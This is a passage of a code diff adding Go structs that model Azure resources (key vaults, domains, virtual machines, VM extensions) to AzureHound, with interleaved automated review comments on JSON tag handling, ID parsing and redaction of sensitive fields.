+ // The URI of the vault for performing operations on keys and secrets. This property is readonly.
+ VaultUri string `json:"vaultUri,omitempty"`
+}
diff --git a/models/azure/vault_secret_group.go b/models/azure/vault_secret_group.go
new file mode 100644
index 0000000..77c3e97
--- /dev/null
+++ b/models/azure/vault_secret_group.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes a set of certificates which are all in the same Key Vault.
+type VaultSecretGroup struct {
+ // The relative URL of the Key Vault containing all of the certificates in VaultCertificates.
+ SourceVault SubResource `json:"sourceVault,omitempty"`
+
+ // The list of key vault references in SourceVault which contain certificates.
+ VaultCertificates []VaultCertificate `json:"vaultCertificates,omitempty"`
+}
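Review bot: In models/azure/vault_props.go, `NetworkAcls NetworkRuleSet` and `Sku Sku` are struct values tagged `omitempty`, and `encoding/json` never treats a struct value as empty, so the tag has no effect on them. A vault whose response carried no `networkAcls` is therefore re-encoded with a zero-valued rule set, and a reader of the output cannot tell "no network rules returned" from an explicitly empty rule set. `NetworkRuleSet` is declared outside this hunk, so how its zero value serialises is not visible here. Making the field a pointer preserves absence: `NetworkAcls *NetworkRuleSet` with the tag unchanged, and likewise for `Sku` if absence matters there.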
diff --git a/models/azure/verified_domain.go b/models/azure/verified_domain.go
new file mode 100644
index 0000000..6e18adf
--- /dev/null
+++ b/models/azure/verified_domain.go
@@ -0,0 +1,36 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies a domain for a tenant.
+type VerifiedDomain struct {
+ // For example, "Email", "OfficeCommunicationsOnline".
+ Capabilities string `json:"capabilities,omitempty"`
+
+ // `true` if this is the default domain associated with the tenant; otherwise, `false`.
+ IsDefault bool `json:"isDefault,omitempty"`
+
+ // `true` if this is the initial domain associated with the tenant; otherwise, `false`.
+ IsInitial bool `json:"isInitial,omitempty"`
+
+ // The domain name; for example, “contoso.onmicrosoft.com”.
+ Name string `json:"name,omitempty"`
+
+ // For example, "Managed".
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/verified_publisher.go b/models/azure/verified_publisher.go
new file mode 100644
index 0000000..c8369a9
--- /dev/null
+++ b/models/azure/verified_publisher.go
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Represents the verified publisher of the application.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/verifiedpublisher?view=graph-rest-1.0
+type VerifiedPublisher struct {
+ // The verified publisher name from the app publisher's Partner Center account.
+ DisplayName string `json:"displayName,omitempty"`
+
+ // The ID of the verified publisher from the app publisher's Partner Center account.
+ VerifiedPublisherId string `json:"verifiedPublisherId,omitempty"`
+
+ // The timestamp when the verified publisher was first added or most recently updated.
+ AddedDateTime string `json:"addedDateTime,omitempty"`
+}
diff --git a/models/azure/virtual_application.go b/models/azure/virtual_application.go
new file mode 100644
index 0000000..12d41cd
--- /dev/null
+++ b/models/azure/virtual_application.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type VirtualApplication struct {
+ PhysicalPath string `json:"physicalPath,omitempty"`
+ PreloadEnabled bool `json:"preloadEnabled,omitempty"`
+ VirtualDirectories []VirtualDirectory `json:"virtualDirectories,omitempty"`
+ VirtualPath string `json:"virtualPath,omitempty"`
+}
+
+type VirtualDirectory struct {
+ PhysicalPath string `json:"physicalPath,omitempty"`
+ VirtualPath string `json:"virtualPath,omitempty"`
+}
diff --git a/models/azure/virtual_hard_disk.go b/models/azure/virtual_hard_disk.go
new file mode 100644
index 0000000..ed9c205
--- /dev/null
+++ b/models/azure/virtual_hard_disk.go
@@ -0,0 +1,23 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes the uri of a disk.
+type VirtualHardDisk struct {
+ Uri string `json:"uri,omitempty"`
+}
diff --git a/models/azure/virtual_machine.go b/models/azure/virtual_machine.go
new file mode 100644
index 0000000..64cbb48
--- /dev/null
+++ b/models/azure/virtual_machine.go
@@ -0,0 +1,53 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "strings"
+
+type VirtualMachine struct {
+ Entity
+
+ ExtendedLocation ExtendedLocation `json:"extendedLocation,omitempty"`
+ Identity ManagedIdentity `json:"identity,omitempty"`
+ Location string `json:"location,omitempty"`
+ Name string `json:"name,omitempty"`
+ Plan Plan `json:"plan,omitempty"`
+ Properties VirtualMachineProperties `json:"properties,omitempty"`
+ Resources []VirtualMachineExtension `json:"resources,omitempty"`
+ Tags map[string]string `json:"tags,omitempty"`
+ Type string `json:"type,omitempty"`
+ Zones []string `json:"zones,omitempty"`
+}
+
+func (s VirtualMachine) ResourceGroupName() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 4 {
+ return parts[4]
+ } else {
+ return ""
+ }
+}
+
+func (s VirtualMachine) ResourceGroupId() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 5 {
+ return strings.Join(parts[:5], "/")
+ } else {
+ return ""
+ }
+}
diff --git a/models/azure/virtual_machine_agent_instance_view.go b/models/azure/virtual_machine_agent_instance_view.go
new file mode 100644
index 0000000..939cd8e
--- /dev/null
+++ b/models/azure/virtual_machine_agent_instance_view.go
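Review bot: `ResourceGroupName` and `ResourceGroupId` pick the resource group purely by position after splitting `s.Id` on "/", so an ID that does not follow the `/subscriptions/{id}/resourceGroups/{name}/...` layout returns an unrelated segment instead of the empty string, and that value would then be attributed to the VM as its resource group. Checking the marker segment makes the mismatch explicit: `if len(parts) > 4 && strings.EqualFold(parts[3], "resourceGroups") { return parts[4] }`, with the same guard in `ResourceGroupId`. The `else` after a terminating `return` can be dropped in both methods, and each exported method would benefit from a doc comment stating the ID layout it expects and that "" means "not derivable".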
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The instance view of the the VM Agent running on the virtual machine.
+type VirtualMachineAgentInstanceView struct {
+ // The virtual machine extension handler instance view.
+ ExtensionHandlers []VirtualMachineExtensionHandlerInstanceView `json:"extensionHandlers,omitempty"`
+
+ // The resource status information.
+ Statuses []InstanceViewStatus `json:"statuses,omitempty"`
+
+ // The VM Agent full version.
+ VMAgentVersion string `json:"vmAgentVersion,omitempty"`
+}
diff --git a/models/azure/virtual_machine_extension.go b/models/azure/virtual_machine_extension.go
new file mode 100644
index 0000000..be223d7
--- /dev/null
+++ b/models/azure/virtual_machine_extension.go
@@ -0,0 +1,38 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes a Virtual Machine Extension.
+type VirtualMachineExtension struct {
+ // Resource ID.
+ Id string `json:"id,omitempty"`
+
+ // Resource location.
+ Location string `json:"location,omitempty"`
+
+ // Resource name.
+ Name string `json:"name,omitempty"`
+
+ Properties VMExtensionProperties `json:"properties,omitempty"`
+
+ // Resource tags.
+ Tags map[string]string `json:"tags,omitempty"`
+
+ // Resource type.
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/virtual_machine_extension_handler_instance_view.go b/models/azure/virtual_machine_extension_handler_instance_view.go
new file mode 100644
index 0000000..9dbe4fc
--- /dev/null
+++ b/models/azure/virtual_machine_extension_handler_instance_view.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The instance view of a virtual machine extension handler.
+type VirtualMachineExtensionHandlerInstanceView struct {
+ // The extension handler status.
+ Status InstanceViewStatus `json:"status,omitempty"`
+
+ // Specifies the type of the extension; an example is "CustomScriptExtension".
+ Type string `json:"type,omitempty"`
+
+ // Specifies the version of the script handler.
+ TypeHandlerVersion string `json:"typeHandlerVersion,omitempty"`
+}
diff --git a/models/azure/virtual_machine_extension_instance_view.go b/models/azure/virtual_machine_extension_instance_view.go
new file mode 100644
index 0000000..ce5bf18
--- /dev/null
+++ b/models/azure/virtual_machine_extension_instance_view.go
@@ -0,0 +1,36 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The instance view of a virtual machine extension.
+type VirtualMachineExtensionInstanceView struct {
+ // The virtual machine extension name.
+ Name string `json:"name,omitempty"`
+
+ // The resource status information.
+ Statuses []InstanceViewStatus `json:"statuses,omitempty"`
+
+ // The resource status information.
+ Substatuses []InstanceViewStatus `json:"substatuses,omitempty"`
+
+ // Specifies the type of the extension; e.g. "CustomScriptExtension"
+ Type string `json:"type,omitempty"`
+
+ // Specifies the version of the script handler.
+ TypeHandlerVersion string `json:"typeHandlerVersion,omitempty"`
+}
diff --git a/models/azure/virtual_machine_health_status.go b/models/azure/virtual_machine_health_status.go
new file mode 100644
index 0000000..2bb8233
--- /dev/null
+++ b/models/azure/virtual_machine_health_status.go
@@ -0,0 +1,24 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// The health status of the VM.
+type VirtualMachineHealthStatus struct {
+ // The health status information for the VM.
+ Status InstanceViewStatus `json:"status,omitempty"`
+}
diff --git a/models/azure/virtual_machine_instance_view.go b/models/azure/virtual_machine_instance_view.go
new file mode 100644
index 0000000..f0c9b36
--- /dev/null
+++ b/models/azure/virtual_machine_instance_view.go
@@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +// The instance view of a virtual machine. +type VirtualMachineInstanceView struct { + // Resource id of the dedicated host, on which the virtual machine is allocated through automatic placement, when + // the virtual machine is associated with a dedicated host group that has automatic placement enabled. + // Minimum api-version: 2020-06-01. + AssignedHost string `json:"assignedHost,omitempty"` + + // Boot Diagnostics is a debugging feature which allows you to view Console Output and Screenshot to diagnose VM + // status. + // You can easily view the output of your console log. + // Azure also enables you to see a screenshot of the VM from the hypervisor. + BootDiagnotics BootDiagnoticsInstanceView `json:"bootDiagnotics,omitempty"` + + // The computer name assigned to the virtual machine. + ComputerName string `json:"computerName,omitempty"` + + // The virtual machine disk information. + Disks []DiskInstanceView `json:"disks,omitempty"` + + // The extensions information. + Extensions []VirtualMachineExtensionInstanceView `json:"extensions,omitempty"` + + // Specifies the HyperVGeneration Type associated with a resource. 
+ HyperVGeneration enums.HyperVGeneration `json:"hyperVGeneration,omitempty"` + + // The Maintenance Operation status on the virtual machine. + MaintenanceRedeployStatus MaintenanceRedeployStatus `json:"maintenanceRedeployStatus,omitempty"` + + // The Operating System running on the virtual machine. + OSName string `json:"osName,omitempty"` + + // The version of Operating System running on the virtual machine. + OSVersion string `json:"osVersion,omitempty"` + + // [Preview Feature] The status of the virtual machine patch operations. + PatchStatus VirtualMachinePatchStatus `json:"patchStatus,omitempty"` + + // Specifies the fault domain of the virtual machine. + PlatformFaultDomain int `json:"platformFaultDomain,omitempty"` + + // Specifies the update domain of the virtual machine. + PlatformUpdateDomain int `json:"platformUpdateDomain,omitempty"` + + // The remote desktop certificate thumbprint. + RDPThumbPrint string `json:"rdpThumbPrint,omitempty"` + + // The resource status information. + Statuses []InstanceViewStatus `json:"statuses,omitempty"` + + // The VM Agent running on the virtual machine. + VMAgent VirtualMachineAgentInstanceView `json:"vmAgent,omitempty"` + + // The health status for the VM. + VMHealth VirtualMachineHealthStatus `json:"vmHealth,omitempty"` +} diff --git a/models/azure/virtual_machine_network_interface_config.go b/models/azure/virtual_machine_network_interface_config.go new file mode 100644 index 0000000..64a61e7 --- /dev/null +++ b/models/azure/virtual_machine_network_interface_config.go 
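Review bot: The `BootDiagnotics` field in `VirtualMachineInstanceView` is tagged `json:"bootDiagnotics,omitempty"`, dropping the "s" that the field's own comment ("Boot Diagnostics") spells out. encoding/json matches object keys against the tag name, so a response key spelled `bootDiagnostics` would be silently ignored and the field left at its zero value, with no error to reveal the gap. If the API key is indeed `bootDiagnostics`, the tag should read `json:"bootDiagnostics,omitempty"`. The type `BootDiagnoticsInstanceView` carries the same spelling but is declared outside this hunk, so renaming it needs a matching change there.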
@@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a virtual machine network interface configuration. +type VirtualMachineNetworkInterfaceConfiguration struct { + // The network interface configuration name. + Name string `json:"name,omitempty"` + + Properties VMNetworkInterfaceConfigurationProperties `json:"properties,omitempty"` +} diff --git a/models/azure/virtual_machine_patch_status.go b/models/azure/virtual_machine_patch_status.go new file mode 100644 index 0000000..800b32a --- /dev/null +++ b/models/azure/virtual_machine_patch_status.go 
@@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The status ov virtual machine patch operations. +type VirtualMachinePatchStatus struct { + // The available patch summary of the latest assessment operation for the virtual machine. + AvailablePatchSummary AvailablePatchSummary `json:"availablePatchSummary,omitempty"` + + // The enablement status of the specified patchMode. + ConfigurationStatuses []InstanceViewStatus `json:"configurationStatuses,omitempty"` + + // The installation summary of the latest installation operation for the virtual machine. + LastPatchInstallationSummary LastPatchInstallationSummary `json:"lastPatchInstallationSummary,omitempty"` +} diff --git a/models/azure/virtual_machine_props.go b/models/azure/virtual_machine_props.go new file mode 100644 index 0000000..7fe25f0 --- /dev/null +++ b/models/azure/virtual_machine_props.go 
@@ -0,0 +1,50 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +type VirtualMachineProperties struct { + AdditionalCapabilities AdditionalCapabilities `json:"additionalCapabilities,omitempty"` + ApplicationProfile ApplicationProfile `json:"applicationProfile,omitempty"` + AvailabilitySet SubResource `json:"availabilitySet,omitempty"` + BillingProfile BillingProfile `json:"billingProfile,omitempty"` + CapacityReservation CapacityReservationProfile `json:"capacityReservation,omitempty"` + DiagnosticsProfile DiagnosticsProfile `json:"diagnosticsProfile,omitempty"` + EvictionPolicy enums.VMEvictionPolicy `json:"evictionPolicy,omitempty"` + ExtensionsTimeBudget string `json:"extensionsTimeBudget,omitempty"` + HardwareProfile HardwareProfile `json:"hardwareProfile,omitempty"` + Host SubResource `json:"host,omitempty"` + HostGroup SubResource `json:"hostGroup,omitempty"` + InstanceView VirtualMachineInstanceView `json:"instanceView,omitempty"` + LicenseType string `json:"licenseType,omitempty"` + NetworkProfile NetworkProfile `json:"networkProfile,omitempty"` + OSProfile OSProfile `json:"osProfile,omitempty"` + PlatformFaultDomain int `json:"platformFaultDomain,omitempty"` + Priority enums.VMPriority `json:"priority,omitempty"` + 
ProvisioningState string `json:"provisioningState,omitempty"` + ProximityPlacementGroup SubResource `json:"proximityPlacementGroup,omitempty"` + ScheduledEventsProfile ScheduledEventsProfile `json:"scheduledEventsProfile,omitempty"` + SecurityProfile SecurityProfile `json:"securityProfile,omitempty"` + StorageProfile StorageProfile `json:"storageProfile,omitempty"` + UserData string `json:"userData,omitempty"` + VirtualMachineScaleSet SubResource `json:"virtualMachineScaleSet,omitempty"` + VMId string `json:"vmId,omitempty"` +} diff --git a/models/azure/virtual_network_rule.go b/models/azure/virtual_network_rule.go new file mode 100644 index 0000000..80ee922 --- /dev/null +++ b/models/azure/virtual_network_rule.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// A rule governing the accessibility of a vault from a specific virtual network. +type VirtualNetworkRule struct { + // Full resource id of a vnet subnet, such as + // '/subscriptions/subid/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/test-vnet/subnets/subnet1'. + Id string `json:"id,omitempty"` + + // Property to specify whether NRP will ignore the check if parent subnet has serviceEndpoints configured. + IgnoreMissingVnetServiceEndpoint bool `json:"ignoreMissingVnetServiceEndpoint,omitempty"` +} 
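Review bot: `VirtualMachineProperties` is the only large struct in this group without any doc comments, and it includes `UserData` and `OSProfile`, fields that may carry deployment-time material such as bootstrap scripts or credentials. A comment above `UserData` along the lines of `// UserData is the deployment-supplied user data blob; treat collected values as sensitive.` would tell anyone storing or sharing the collected output to protect it. Separately, `omitempty` has no effect on struct-valued fields such as `HardwareProfile` or `SecurityProfile` in encoding/json, so those are always emitted when marshalled; pointer types would be needed if empty objects are meant to be omitted.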
diff --git a/models/azure/vm_extension_props.go b/models/azure/vm_extension_props.go new file mode 100644 index 0000000..1fdcb3b --- /dev/null +++ b/models/azure/vm_extension_props.go 
@@ -0,0 +1,59 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type VMExtensionProperties struct { + // Indicates whether the extension should use a newer minor version if one is available at deployment time. + // Once deployed, however, the extension will not upgrade minor versions unless redeployed, even with this property + // set to true. + AutoUpgradeMinorVersion bool `json:"autoUpgradeMinorVersion,omitempty"` + + // Indicates whether the extension should be automatically upgraded by the platform if there is a newer version of + // the extension available. + EnabledAutomaticUpgrade bool `json:"enabledAutomaticUpgrade,omitempty"` + + // How the extension handler should be forced to update even if the extension configuration has not changed. + ForceUpdateTag string `json:"forceUpdateTag,omitempty"` + + // The virtual machine extension instance view. + InstanceView VirtualMachineExtensionInstanceView `json:"instanceView,omitempty"` + + // The extension can contain either protectedSettings or protectedSettingsFromKeyVault or no protected settings at + // all. + ProtectedSettings map[string]string `json:"protectedSettings,omitempty"` + + // The provisioning state, which only appears in the response. 
+ ProvisioningState string `json:"provisioningState,omitempty"` + + // The name of the extension handler publisher. + Publisher string `json:"publisher,omitempty"` + + // Json formatted public settings for the extension. + Settings map[string]string `json:"settings,omitempty"` + + // Indicates whether failures stemming from the extension will be suppressed (Operational failures such as not + // connecting to the VM will not be suppressed regardless of this value). + // The default is false. + SuppressFailures bool `json:"suppressFailures,omitempty"` + + // Specifies the type of the extension; an example is "CustomScriptExtension". + Type string `json:"type,omitempty"` + + // Specifies the version of the script handler. + TypeHandlerVersion string `json:"typeHandlerVersion,omitempty"` +} diff --git a/models/azure/vm_gallery_app.go b/models/azure/vm_gallery_app.go new file mode 100644 index 0000000..40838fd --- /dev/null +++ b/models/azure/vm_gallery_app.go 
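Review bot: `Settings` and `ProtectedSettings` in `VMExtensionProperties` are declared as `map[string]string`, yet the comment on `Settings` describes it as "Json formatted public settings". Any value that is not a JSON string (nested object, array, number, boolean) makes encoding/json return an unmarshal error for the enclosing document rather than just skipping the field. Declaring both as `map[string]any` (or `map[string]interface{}` on older toolchains), with the tags unchanged, accepts arbitrary JSON without a new import. `ProtectedSettings` is the secret half of an extension's configuration, so a comment stating that populated values must be redacted before output is written, or a `json:"-"` tag if the field is never needed, would make the handling explicit. The tag `enabledAutomaticUpgrade` also looks misspelled against the Azure property name (`enableAutomaticUpgrade`, to be confirmed against the API reference).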
@@ -0,0 +1,35 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies the required information to reference a compute gallery application version. +type VMGalleryApplication struct { + // Optional, Specifies the uri to an azure blob that will replace the default configuration for the package if + // provided. + ConfigurationReference string `json:"configurationReference,omitempty"` + + // Optional, Specifies the order in which the packages have to be installed. + Order int `json:"order,omitempty"` + + // Specifies the GalleryApplicationVersion resource id on the form of + // /subscriptions/{SubscriptionId}/resourceGroups/{ResourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{application}/versions/{version} + PackageReferenceId string `json:"packageReferenceId,omitempty"` + + // Optional, Specifies a passthrough value for more generic context. + Tags string `json:"tags,omitempty"` +} diff --git a/models/azure/vm_ip_config_props.go b/models/azure/vm_ip_config_props.go new file mode 100644 index 0000000..8b1751d --- /dev/null +++ b/models/azure/vm_ip_config_props.go 
@@ -0,0 +1,46 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type VMIPConfigProperties struct { + // Specifies an array of references to backend address pools of application gateways. A virtual machine can + // reference backend address pools of multiple application gateways. Multiple virtual machines cannot use the same + // application gateway. + ApplicationGatewayBackendAddressPools []SubResource `json:"applicationGatewayBackendAddressPools,omitempty"` + + // Specifies an array of references to application security group. + ApplicationSecurityGroups []SubResource `json:"applicationSecurityGroups,omitempty"` + + // Specifies an array of references to backend address pools of load balancers. A virtual machine can reference + // backend address pools of one public and one internal load balancer. [Multiple virtual machines cannot use the + // same basic sku load balancer]. + LoadBalancerBackendAddressPools []SubResource `json:"loadBalancerBackendAddressPools,omitempty"` + + // Specifies the primary network interface in case the virtual machine has more than 1 network interface. + Primary bool `json:"primary,omitempty"` + + // Available from Api-Version 2017-03-30 onwards, it represents whether the specific ipconfiguration is IPv4 or IPv6. + // Default is taken as IPv4. 
